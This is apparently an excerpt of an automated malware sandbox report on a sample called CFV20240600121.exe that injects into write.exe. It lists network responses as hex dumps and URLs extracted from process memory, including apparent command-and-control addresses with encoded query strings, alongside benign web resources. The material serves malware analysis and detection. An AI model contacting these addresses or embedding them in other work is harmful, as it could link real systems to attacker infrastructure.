68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 
2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 10 Jun 2024 08:22:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 
2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 1238; date: Mon, 10 Jun 2024 08:22:47 GMT; server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 1238; date: Mon, 10 Jun 2024 08:22:50 GMT; server: LiteSpeed
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Mon, 10 Jun 2024 08:22:58 GMT; Server: Apache; Content-Length: 16026; Connection: close; Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Mon, 10 Jun 2024 08:23:01 GMT; Server: Apache; Content-Length: 16026; Connection: close; Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Mon, 10 Jun 2024 08:23:03 GMT; Server: Apache; Content-Length: 16026; Connection: close; Content-Type: text/html
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Mon, 10 Jun 2024 08:23:06 GMT; Server: Apache; Content-Length: 16026; Connection: close; Content-Type: text/html; charset=utf-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty; Date: Mon, 10 Jun 2024 08:23:40 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty; Date: Mon, 10 Jun 2024 08:23:43 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty; Date: Mon, 10 Jun 2024 08:23:45 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Server: openresty; Date: Mon, 10 Jun 2024 08:23:48 GMT; Content-Type: text/html; Content-Length: 150; Connection: close; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://gmpg.org/xfn/11
            Source: write.exe, 00000015.00000002.4525142132.0000000006768000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003E68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://lecoinsa.net/xu8t/?kH=00U8ENLHk&TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRG
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003E68000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OM
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
            Source: CFV20240600121.exe, 00000000.00000002.2093778209.00000000033F3000.00000004.00000800.00020000.00000000.sdmp, BPSHhDGmARC.exe, 0000000D.00000002.2305537186.00000000028EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: write.exe, 00000015.00000002.4525142132.0000000006444000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003B44000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4526253929.0000000004F53000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lunareafurniture.com
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4526253929.0000000004F53000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lunareafurniture.com/wzcd/
            Source: BPSHhDGmARC.exe.0.dr String found in binary or memory: http://www.onelook.com/?w=
            Source: write.exe, 00000015.00000002.4525142132.0000000006C1E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000431E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.webuyfontana.com/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/plugins/quiz-maker/public/css/quiz-maker-public.css?ver=6.3.3.0
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/plugins/themeisle-companion/obfx_modules/companion-legacy/asset
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.2
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.2
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/css/font-sizes.min.css?ver=3.0.21
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.21
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.21
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.4
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://api.w.org/
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: write.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: write.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C400%2C500%2C700%7CRoboto
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72
            Source: write.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: write.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://js.users.51.la/21876343.js
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: write.exe, 00000015.00000002.4523478744.0000000003019000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: write.exe, 00000015.00000002.4523478744.0000000003019000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2hh
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: write.exe, 00000015.00000002.4523478744.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: write.exe, 00000015.00000002.4523478744.0000000003019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: write.exe, 00000015.00000003.2560137531.0000000007F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://themeisle.com
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: write.exe, 00000015.00000002.4525142132.0000000005DFC000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.00000000034FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: write.exe, 00000015.00000002.4525142132.0000000005AD8000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.00000000031D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.magnoliahairandco.com/fkxp?kH=00U8ENLHk&TTv82Lg=%2F8gewv%2F74QCfxJQQ58xYAEc5kagwqNCJuIN4
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/cloudhost/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/jiaoyi/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/domain/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/mail/
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.west.cn/services/webhosting/
